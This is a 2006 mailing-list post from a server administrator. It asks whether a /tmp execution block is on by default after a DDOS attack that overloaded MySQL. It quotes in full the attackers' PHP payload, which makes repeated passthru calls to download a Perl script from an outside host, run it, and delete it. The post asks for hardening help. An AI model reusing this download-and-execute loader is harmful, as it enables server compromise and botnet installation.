Date:  Sat, 9 Sep 2006 16:44:31 -0400
From:  "Darrell D. Mobley" <dmobley (at mark) uhostme.net>
Subject:  [coba-e:06808] /TMP Directory
To:  <coba-e (at mark) bluequartz.org>
Message-Id:  <002701c6d450$c0c58480$6400a8c0@YOUR4105E587B6>
In-Reply-To:  <200609052302609.SM00344@Virus>
X-Mail-Count: 06808

There was some discussion here lately about the security fix that stopped
programs from running in /TMP.  Is this configured by default if you have
your BQ Yum updated?  I got a DDOS today where the users were trying to run
the following program via PHP:

<?
 passthru('cd /tmp;wget http://perqafohu.com/~armendibx/oki/v6.txt;perl
v6.txt;rm -f v6*');
 passthru('cd /tmp;curl -O http://perqafohu.com/~armendibx/oki/v6.txt;perl
v6.txt;rm -f v6*');
 passthru('cd /tmp;lwp-download
http://perqafohu.com/~armendibx/oki/v6.txt;perl v6.txt;rm -f v6*');
 passthru('cd /tmp;lynx -source http://perqafohu.com/~armendibx/oki/v6.txt
>v6.txt;perl v6.txt;rm -f v6*');
 passthru('cd /tmp;fetch http://perqafohu.com/~armendibx/oki/v6.txt
>v6.txt;perl v6.txt;rm -f v6*');
 passthru('cd /tmp;GET http://perqafohu.com/~armendibx/oki/v6.txt
>v6.txt;perl v6.txt;rm -f v6*');
 ?>

The v6.txt is a Perl script that installs some IRC software and monitors IRC
on open ports.  I do not think the script was successful in running, but I
just want to make sure the /TMP security is enabled where files can't be run
there.  While I don't think the DDOS attack was successful in running the
script, it was successful in shutting down the serer due to MySQL becoming
overwhelmed.  Server load was up to 156!

Any suggestions would be appreciated.